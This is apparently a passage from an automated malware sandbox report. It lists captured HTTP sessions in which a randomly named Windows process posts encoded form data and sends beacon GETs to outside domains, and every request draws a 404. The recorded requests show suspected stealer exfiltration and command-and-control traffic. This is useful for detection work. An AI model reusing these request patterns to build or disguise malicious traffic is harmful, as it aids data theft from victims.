                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.449794146.88.233.115803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:52.848275900 CET10721OUTPOST /11t3/ HTTP/1.1
                                                                                                                    Host: www.smartcongress.net
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.smartcongress.net
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.smartcongress.net/11t3/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 55 38 70 59 55 50 64 6e 34 34 38 6c 67 79 49 49 68 6a 51 44 6f 68 45 6d 53 43 48 51 6f 50 6b 59 44 72 77 41 4f 37 42 32 55 36 67 4a 49 37 55 78 50 6e 4c 4c 46 4f 78 47 6b 76 61 68 56 39 44 58 61 4f 5a 44 37 53 55 70 38 4d 49 34 4d 31 66 62 68 4e 38 7a 73 31 57 35 49 54 67 52 30 76 72 30 2f 41 76 2b 62 53 71 4b 43 62 31 6a 6d 41 72 2b 74 4b 78 76 4f 4e 79 37 55 79 30 55 33 68 61 30 38 46 70 49 72 6e 4b 52 2b 6b 50 68 33 64 32 76 65 75 52 70 78 47 43 4b 78 57 76 45 74 34 4a 78 2f 61 61 74 69 63 43 70 59 41 65 2f 39 72 56 6f 71 63 6e 4d 46 47 38 49 45 76 64 2b 49 45 74 6f 4a 59 6d 6d 35 45 39 4e 6f 66 53 72 39 57 77 4e 4f 41 73 61 62 65 6b 47 77 56 61 6b 75 30 37 69 37 33 56 43 51 72 2b 42 66 79 45 65 6b 39 74 6a 44 38 44 54 65 48 4a 74 6e 77 41 33 37 4a 2f 37 31 34 33 43 35 50 38 50 61 50 64 66 4e 37 65 63 70 4c 74 5a 6f 52 43 72 32 44 46 2b 50 5a 6f 6a [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PU8pYUPdn448lgyIIhjQDohEmSCHQoPkYDrwAO7B2U6gJI7UxPnLLFOxGkvahV9DXaOZD7SUp8MI4M1fbhN8zs1W5ITgR0vr0/Av+bSqKCb1jmAr+tKxvONy7Uy0U3ha08FpIrnKR+kPh3d2veuRpxGCKxWvEt4Jx/aaticCpYAe/9rVoqcnMFG8IEvd+IEtoJYmm5E9NofSr9WwNOAsabekGwVaku07i73VCQr+BfyEek9tjD8DTeHJtnwA37J/7143C5P8PaPdfN7ecpLtZoRCr2DF+PZojM8lzOFGfTxCH8EqXu3C2UHCZy+fhK6OG7cfqcYO19CATZv+Ba6H0X5eqkngno6thPXKQmB6pqLBYll61GOIbrZn4C6A0sINml5VaBrJwg4RvUuEwb7+Om0D6oGJ41sGeZFNiUPp2/G9zuKFnhM6I8aqTvAKsCcnyvjAr4nDZdKFdCw2LzUSnqQcdeFuXtiJv1GY5KFhcpSb3Yle3pbEZijCYBgWa4H2kKW2Gg6U/GoKG/1To/jH3xZC44ZWU0g20qy4fOJRRNZYv9jzrGOxlruhVeUoIVq+wp/xtUfYvJMRHzLIwx5HZhA0PQCZwjMIFFdswOxXuVkw6D3eC2kgy5qLS6tF411rhMHxegc1hlmQbNCvOyidLodSEBMCpGvRcjeNMF7Xw9hU4oQr8IJMwEibP1YVIqBeZ9FDZVZ5KsmpfjOvD8jaSDBLJF9RFmPcNfaBHVtqVYhpm5useO3mQfKZUj/g7wQQS4Ktcj4LjzKT1HSJxQlOGZepInn30vOzQk4s0gZzcRe4TmVgYNICPDCken2aaiCcDsy4A9a4F2ll87BGGscwZbNWai2xebR8CIGOBXw0A8MFrGdN/sjo+U/uMQHIptZn7ekkeRsdYr2wsuklj4wkWjAWTLspkYAnzPEDOJ/2I8xT7pdVFOU6qcNvGsBYXofD0Eo [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:57:54.255985022 CET380INHTTP/1.1 404 Not Found
                                                                                                                    content-type: text/html; charset=iso-8859-1
                                                                                                                    content-length: 196
                                                                                                                    date: Thu, 21 Nov 2024 15:57:54 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    x-tuned-by: N0C
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.449800146.88.233.115803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:57:55.500983000 CET351OUTGET /11t3/?GzeXFT7=BoXQYlgPFtFW2+QFcsMkz8ZnQyv1gPD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01336IGNy75YpYvoXliURpgNXuxXH/BaJU0H7s=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.smartcongress.net
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:57:56.857182026 CET380INHTTP/1.1 404 Not Found
                                                                                                                    content-type: text/html; charset=iso-8859-1
                                                                                                                    content-length: 196
                                                                                                                    date: Thu, 21 Nov 2024 15:57:56 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    x-tuned-by: N0C
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.449816194.85.61.76803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:02.149173021 CET616OUTPOST /2pji/ HTTP/1.1
                                                                                                                    Host: www.mrpokrovskii.pro
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.mrpokrovskii.pro
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 56 49 42 6c 6e 71 72 58 31 36 62 45 45 2f 70 79 34 42 55 7a 34 37 4e 6f 6c 4c 73 43 68 45 6f 45 70 6b 39 66 74 65 76 62 67 78 38 66 5a 59 68 54 45 67 44 61 4f 5a 68 6b 59 42 62 4c 43 7a 61 6e 6c 38 77 36 51 79 51 56 37 44 52 72 75 76 59 53 39 33 4c 5a 2f 6d 68 39 63 64 53 6a 6a 36 51 66 55 4e 6e 72 4a 55 31 2b 56 56 70 31 57 73 71 30 44 4f 31 50 2f 49 72 6e 55 39 61 55 44 64 51 41 42 37 63 36 4f 2b 2f 2b 32 68 4b 4e 59 6e 4e 4d 35 41 57 59 6b 77 34 76 56 44 4c 63 67 67 65 76 52 2b 59 69 79 6b 6a 6b 55 30 6b 34 42 53 77 71 69 64 6f 76 6b 67 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYkw4vVDLcggevR+YiykjkU0k4BSwqidovkg==
                                                                                                                    Nov 21, 2024 16:58:03.543853998 CET691INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.449822194.85.61.76803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:04.823296070 CET636OUTPOST /2pji/ HTTP/1.1
                                                                                                                    Host: www.mrpokrovskii.pro
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.mrpokrovskii.pro
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 41 45 71 41 35 66 72 71 62 62 6e 78 38 66 4d 6f 67 5a 4a 41 44 52 4f 5a 64 61 59 46 48 4c 43 7a 4f 6e 6c 2b 34 36 52 46 38 53 36 54 52 70 33 2f 59 51 6c 58 4c 5a 2f 6d 68 39 63 64 58 47 6a 38 34 66 56 38 58 72 49 31 31 39 4a 46 70 32 65 4d 71 30 49 75 31 55 2f 49 71 43 55 38 57 36 44 65 34 41 42 2f 59 36 4f 71 72 39 34 68 4b 4c 41 48 4d 6d 2b 56 4c 47 68 51 6b 69 4b 79 62 34 75 6a 71 59 5a 59 56 34 6a 56 43 7a 47 30 41 4c 63 56 35 65 76 65 56 6d 2f 75 37 71 68 4a 68 6b 31 69 55 53 50 76 5a 4e 79 7a 4e 33 52 4b 49 3d
                                                                                                                    Data Ascii: GzeXFT7=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0ALcV5eveVm/u7qhJhk1iUSPvZNyzN3RKI=
                                                                                                                    Nov 21, 2024 16:58:06.191494942 CET691INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.449831194.85.61.76803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:07.522226095 CET10718OUTPOST /2pji/ HTTP/1.1
                                                                                                                    Host: www.mrpokrovskii.pro
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.mrpokrovskii.pro
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 59 45 70 7a 78 66 74 37 62 62 6d 78 38 66 51 34 67 61 4a 41 44 4d 4f 64 78 65 59 46 4c 62 43 77 32 6e 6c 63 41 36 59 58 45 53 77 54 52 70 2f 66 59 56 39 33 4b 44 2f 6d 78 35 63 64 48 47 6a 38 34 66 56 2b 50 72 42 45 31 39 61 31 70 31 57 73 71 77 44 4f 30 61 2f 49 6a 2f 55 38 43 45 44 50 59 41 41 62 38 36 49 63 58 39 77 68 4b 4a 56 48 4d 2b 2b 56 50 6e 68 51 4a 54 4b 79 76 47 75 6b 43 59 63 50 6c 6a 68 6d 71 53 59 46 68 56 4b 6b 42 49 6d 38 41 71 79 4e 33 2b 75 5a 39 54 77 68 45 6b 49 59 77 33 70 52 4e 31 4c 66 44 72 46 71 46 73 46 56 54 55 37 31 49 2f 6a 4f 32 41 2b 35 53 2b 36 45 33 75 36 43 38 38 76 32 44 42 44 59 4f 2b 34 49 36 78 31 49 39 71 70 36 66 6b 49 6a 65 76 66 68 6f 74 68 6f 49 35 6b 55 6c 4a 62 67 34 5a 52 77 2b 67 6e 7a 55 59 2b 61 71 48 4c 2f 70 42 38 4c 4a 50 50 47 49 6a 69 58 5a 32 6f 70 6a 49 52 55 42 41 59 38 6e 32 2b 49 6d 39 72 47 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRYEpzxft7bbmx8fQ4gaJADMOdxeYFLbCw2nlcA6YXESwTRp/fYV93KD/mx5cdHGj84fV+PrBE19a1p1WsqwDO0a/Ij/U8CEDPYAAb86IcX9whKJVHM++VPnhQJTKyvGukCYcPljhmqSYFhVKkBIm8AqyN3+uZ9TwhEkIYw3pRN1LfDrFqFsFVTU71I/jO2A+5S+6E3u6C88v2DBDYO+4I6x1I9qp6fkIjevfhothoI5kUlJbg4ZRw+gnzUY+aqHL/pB8LJPPGIjiXZ2opjIRUBAY8n2+Im9rGwjhmHBqA266NYiWDRRC2QXYH39x7VaMgfYWX8NQVrdsl0tHx7rdauMS6gHQaFScumhzUS8zMIF7BR4gs1z06EPPpdLc9JzIzQuNyr4NFksJLKT/vJh9DBGEbp9h4E8lJWyf21MzOfYX3meWQUw+AhRbXidIhR9Et3C/cfaAy95YhclwHA5GXHPXw1TKXSi/M7K3njlCYR93SNB/6/R1I42T2bqQzuTJu6RyGj53d7IZ2eSShrz2vLqUIkNgBGij43vYBbtSW24W4gHXYHfijRDLAgGm+N1rN8Ay86nUC5Xw94WVRLzyCruBj5Wz+4WCu9/QBHIRDjWgVr34Ls8oeNSWIBGX4AkqM6UDiSro73TATuNGugNCJUB8eOU8oDys+5F07JIWC1pZN6Dau3m2vV/fBIJuBwM6bN8lsXID2dECDa+nnSDo7lF5Dnh2yJ30yoWMrXrZqoYhUH4AQtBPHLNJK7SIfcMEixoVb+zmS3bjoz9/ubSinccUOAdDQEWuPkbbVT7yX63NACYpkb6U+xSDqaReXIZoj8Zh8IQu2QUiXWQg5AxPH1ckxeb5MtOLWqEIybPIA0IoAHb2nmjFYF23/o92EE0Bc95YRIKyEKausntaFuX0a6nVe6rsOvSf2Y9QhEnL1PJUIDwVWanU1+Xgz0HZnX1Jm/V [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:58:08.881669998 CET691INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:08 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.449838194.85.61.76803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:10.183362961 CET350OUTGET /2pji/?GzeXFT7=67iA4TPPdQ9nEroy4uzQwLjmbdlqhQsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT7wZt3N4B7jiHnWlWePCYt+UXdYLjL0ZgeX4=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.mrpokrovskii.pro
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:58:11.507941008 CET691INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:11 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
